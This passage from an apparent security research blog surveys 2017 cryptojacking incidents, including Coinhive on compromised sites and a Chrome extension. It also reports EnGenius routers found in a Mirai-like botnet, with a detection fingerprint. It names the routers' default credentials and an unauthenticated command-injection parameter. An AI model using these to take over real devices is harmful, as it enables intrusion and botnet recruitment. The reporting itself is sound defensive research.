In a statement provided to The Wall Street Journal, PolitiFact Executive Director Aaron Sharockman stated, “Hackers were able to install their script on the fact-checking website after discovering a misconfigured cloud-computing server.”

UFC Fight Pass

UFC Fight Pass hosting Coinhive malware
The cryptojacking of UFC’s Fight Pass website went viral on Reddit as multiple users confirmed the presence of Coinhive.

Early in November, numerous users reported the subscription video streaming service of the UFC, dubbed Fight Pass, was running cryptojacking malware. A customer saved a copy of the source code (above) where Coinhive was found. However, in a statement released to me (below), the UFC denied the code was ever present on their website.

UFC statement regarding cryptojacking allegations

Crucial Memory and Everlast Worldwide

Coinhive found on the website of Crucial Memory

Coinhive on Everlast's website
The cryptojacking of Crucial Memory and Everlast’s website was due a compromised live help chat widget.

On Thanksgiving Day, I found a large cryptojacking campaign of 1,400+ websites. The two most nobables sites were of Crucial Memory and Everlast Worldwide. Normally you would never associate these two brands together,  however both their websites shared a similar embedded code — a live chat widget provided by LiveHelpNow. LiveHelpNow stated one of their CDN servers was compromised and injected with the cryptojacking malware Coinhive.

Globovisión and Movistar

Google Tag Manager was used to inject Coinhive on Globovision's website

Google Tag Manager was used to inject Coinhive on Movistar's website
Google Tag Manager was used to inject Coinhive on Movistar’s and Globovisión website.

In two separate incidents, I found Coinhive was injected into the websites of Globovisión and Movistar using Google Tag Manager. Movistar stated that Coinhive was not put on their website by a hacker, but instead was due to “an internal error” while they were conducting “pre-production tests.” No statement was provided by Globovisión on why the cryptojacking malware appeared on their site on November 15.

Chrome extension “Archive Poster”

Archive Poster Chrome extension infected with cryptojacking malware
Multiple users reported the cryptojacking behavior of the “Archive Poster” extension.

Cryptojacking was not limited to websites in 2017 as we saw Chrome extensions also being affected. One such extension, Archive Poster, remained on the Chrome Web Store for days while silently cryptojacking an unknown portion of their 100,000+ users.

Despite multiple user reports, Google’s response lacked any initiative to remove the malware infected extension. After I reported the issue to them, it was finally pulled.

Other sources of cryptojacking found

Coinhive is not the only the JavaScript cryptocurrency miner available for use. Many clones have popped up in its wake. Using PublicWWW, I was able to find how many websites were using a copycat.

JavaScript cryptocurrency miners
Non-Coinhive JavaScript cryptocurrency miners found on 2017-12-24.

One of the up-and-coming Coinhive knockoffs, Minr, offers built-in obfuscation and uses multiple domain names to evade detection.

Domains used by Minr malware change frequently.

Other notable cryptojacking malware discoveries in 2017

— Being found on nearly 2,500 ecommerce websites
— Masquerading as a jQuery file on 4,000 websites
— Concealed with hidden browser window mining
— Even a Starbucks WiFi provider was found running Coinhive

Heading into 2018, the question remains how to stop the spread of cryptojacking malware. Luckily we have seen anti-mining browser extensions, such as No Coin and MinerBlock, developed to help curb the threat. Another popular ad blocker, uBlock Origin, blocks most cryptojacking scripts now as well. Many anti-malware applications, such as Malwarebytes, have started blocking the effects of cryptojacking.

Cryptojacking malware Coinhive found on 30,000+ websites

Since first going mainstream with The Pirate Bay and Showtime, cryptojacking has quickly become a favorite revenue stream for cybercriminals. Cryptojacking typically begins after Coinhive (JavaScript code) is embedded on a compromised website. Unsuspecting visitors then begin mining the cryptocurrency Monero (XMR) in their browser.

How Cryptojacking Works
How cryptojacking works illustration by the European Union Agency for Network and Information Security (ENISA).

The longer the Coinhive script stays on a compromised site, in addition to the amount/duration of visitors, directly correlates to the profitably of the cryptojacking session. However, the operating cost is still nearly zero for the threat actor (hacker) planting the script. The processing burden of Coinhive is solely laid upon the client (end user). This leads to rapid battery drain and higher energy costs for the afflicted devices.

So how many websites have Coinhive embedded in them? This answer varies depending on the search engine used. To test, I searched for the name of the Coinhive JavaScript library, “coinhive.min.js” via four search engines: Censys, PublicWWW, Shodan, and ZoomEye. The following amount of Coinhive sites were found on 2017-11-04

Censys: 1,640
PublicWWW: 30,611
Shodan: 941
ZoomEye: 474

Since PublicWWW presented the most results, I chose their dataset to analyze. I began cataloging the domain names found by extracting the Coinhive Site Key from each site. Once this was completed, I was able to correlate a single site key to multiple Coinhive infested sites.

NOTE: I also used my own tools to independently verify the PublicWWW results. I felt confident in the data they provided after I had scanned the top  11,000 Coinhive infected sites myself and correlated the results.

The amount of websites tied to one Coinhive Site Key was somewhat astounding. This correlation was also recently noted by security researcher, Willem de Groot. He found 2,496 infected online stores, of which 85% were linked to only two Coinhive accounts.

The most used Coinhive Site Key I found was:

This one key was used on 4,722 sites. Almost all of the sites used the top-level domain “.ir” (ccTLD for Iran). Most of the domain names were four characters long consisting of only random numbers or three characters long consisting of only random words.

Example “numbers only” domains:

Example “letters only” domains:

Example “other” domains:

All domains were registered to a “Mohammad Khezri” of Iran. A reverse WHOIS search on shows 6,040 domains are registered to him. These domains appeared to be parked using service called DNS4.IR that uses Coinhive to monetize the traffic.

Other individual Coinhive Site Keys were associated to a large amount of domain names. Site keys that were found on 100+ domains are shown below. I sampled the content of a handful of sites found for each key. I also looked for trends in the Nameservers (NS) used for each domain. This allowed me to get a general idea of the “theme” of each Coinhive Site Key used.

Coinhive Site Keys found on 100+ domains organized by total domains associated.

Overall, the bulk of the sites were either compromised websites or parked domains. The third-most used key no longer appeared to be actively engaged in cryptojacking and simply redirected to

The range of compromised sites varied greatly due to the sheer volume. Some notable and humorous sites that I encountered included:

Papa John’s Pizza – Puebla, Mexico

Papa John's Pizza - Puebla, Mexico

National  Association of Doctors

National  Association of Doctors

In addition to Coinhive, a fake online pharmacy was found on their website.

National  Association of Doctors fake online pharmacy

Deposit Insurance of VietNam – Vietnamese equivalent of the FDIC

Vietnamese equivalent of the FDIC, Deposit Insurance of VietNam

Ortel Communications (AS23772) – Large ISP in India

Ortel Communications – “Stay Warm Whenever and Wherever”

While this one is clearly a well-thought-out spoof, cryptojacking is no laughing matter. - About

A PublicWWW search shows 4,260 WordPress sites are running Coinhive. A “weather widget” plugin was recently banned from the WordPress plugin repository, however other cryptojacking plugins are still available for site operators to utilize.

Various techniques have been used to spread the Coinhive infestation further, from Android apps to an open Amazon S3 bucket of

Coinhive is not the only JavaScript miner available for cryptojacking use. Many competitors have popped up in its wake. Using PublicWWW, I found JSECoin was in a distant second place behind Coinhive on 905 websites.

Non-Coinhive Miners Pie Chart

Non-Coinhive JavaScript cryptocurrency miners found on PublicWWW:
JSEcoin: 905
Crypto-Loot: 123
AFMiner: 77
ProjectPoi (PPoi): 50
Coinhave: 43
Coinerra: 11
MineMyTraffic: 3
Papoto: 1

It’s clear the cryptojacking frenzy will continue into the near future. To protect yourself from cryptocurrency mining scripts while browsing, I recommend using any of the following Chrome extensions:

uBlock Origin

Many anti-malware applications also block cryptojacking scripts, such as Malwarebytes and Avast.

A request has been made to Google Developers to add functionality in Chrome itself to block malicious JavaScript usage. Anyone can comment to share their feedback with Google here.

In the meantime, I will continue to monitor reports of cryptojacking while reviewing new Coinhive sites found daily.

For the latest updates on this topic, follow me on Twitter @bad_packets.

EnGenius routers found in Mirai-like botnet

EnGenius routers were recently found in a Mirai-like botnet with a distinct network traffic fingerprint. Locating this botnet subset was a joint effort between myself and Dr. Neal Krawetz.

EnGenius logo

This Mirai-like botnet traffic was fingerprinted after a distinct pattern in the packets received was identified by Dr. Krawetz. While the source port was usually randomized, the TCP sequence number was always the same. However, it wasn’t just any static number, it was the destination IP address of the bot’s target.

This behavior was previously noted in a LinkedIn post about IDS rules used to block Mirai scans. This is expected, per the snippet of source code of Miari shown below.

Snippet of Mirai source code

I found 85,100 unique IP addresses used by devices in Mirai-like botnet since 2/18/2017. AS4134 (China Telecom) had most unique IPs with 10,972 seen.

IP addresses seen in Mirai-like botnet by ASN since 2017-02-18

This destination IP address was found to be encoded in of each incoming packet’s sequence number. The example log snippet below illustrates how this is extracted.


In this case the TCP sequence number, written as hex, is 0x48c1af41. When we convert this value from hex to an IP address, we get – which is the destination (target) IP address.

Your logs may vary and instead record the sequence number in decimal format. In the example above, the decimal version of the SEQ = 1220652865 which converts to just the same.

The fingerprint is best illustrated when the target IP address changes as shown below:

TCP Sequence Number = Destination IP

Once the fingerprint of botnet was established, I was able to review the IP addresses found in my logs for further patterns. After reviewing a handful of devices coming from IP addresses in the United States , I noticed a trend in the type of devices. Each was an Engenius ESR300 or ESR600 router.

EnGenius ESR300 router

Both router models are listed on the Engenius website as a “Discontinued Product” and the latest firmware was released on 5/23/2016.

EnGenius Firmware Screenshot

Combining the botnet data from Dr. Krawetz, I independently confirmed 81 of 130 EnGenius routers known to be participating in the botnet.

All incoming traffic from the EnGenius routers was on TCP port 23/2323 (telnet). The highest-volume attackers are shown below and the raw data is available here.

EnGenius Botnet - Top Attackers

The majority of the attacks occurred between 8/25/2017 and 8/29/2017. The type of attack was a SYN flood. This first network traffic from an EnGenius router was observed on 6/15/2017. The raw data of all traffic I observed is available here.

Attacks from EnGenius routers came from all over the world. Most however came from networks in the United States. Both AS11796 (Airstream Communications) and AS13370 (LocalTel Communications) had the most with 12 unique IP address in the EnGenius router botnet.

EnGenius Routers found by ASN with more than one unique IP address
EnGenius Routers found by ASN with more than one unique IP address

The majority of EnGenius routers found had the same ports open to the internet:

UDP 5060 (SIP)
TCP 8081 (HTTP)
TCP 9000 (HTTP)
TCP 10000 (HTTP)

So how easy is it for the average user to access the administrator interface of these routers? Not surprisingly, very easy. The router’s default credentials are quickly found in the user manual.

EnGenius default credentials

But if what you want to take a more “challenging” approach to locate the default creds? Look no further than the JavaScript file loaded when you visit the router’s login page:

Locating the EnGenius default credentials

This file describes all the functions of the router in addition to providing the default credentials:

“Please enter user name and password.”
“The default account is admin/admin.”

If you looking for an even more challenging method to gain access to an EnGenius router, a remote code execution exploit PoC was published by Zero Science Lab earlier this year in which they stated:

EnGenius EnShare suffers from an unauthenticated command injection vulnerability. An attacker can inject and execute arbitrary code as the root user via the ‘path’ GET/POST parameter parsed by ‘usbinteract.cgi’ script.

I was able to confirm this method was viable for some, but not all of the EnGenius routers found in the botnet. Since it’s very easy to gain root access to EnGenius routers, it presents a clear avenue for any malicious party to add them to their botnet.

I contacted EnGenius with my findings and their customer service team replied that my case “has been escalated to the engineering team.” I haven’t received further communication from EnGenius and will update this post if I hear back.

In the meantime, Dr. Krawetz advises:

For network administrators who want to detect infected hosts from this new botnet: Look for SYN packets where tcp.seq==ip.dst.

If you see a match, then the ip.src denotes an infected address. Either the device at that address is infected, or something behind that NAT router is infected.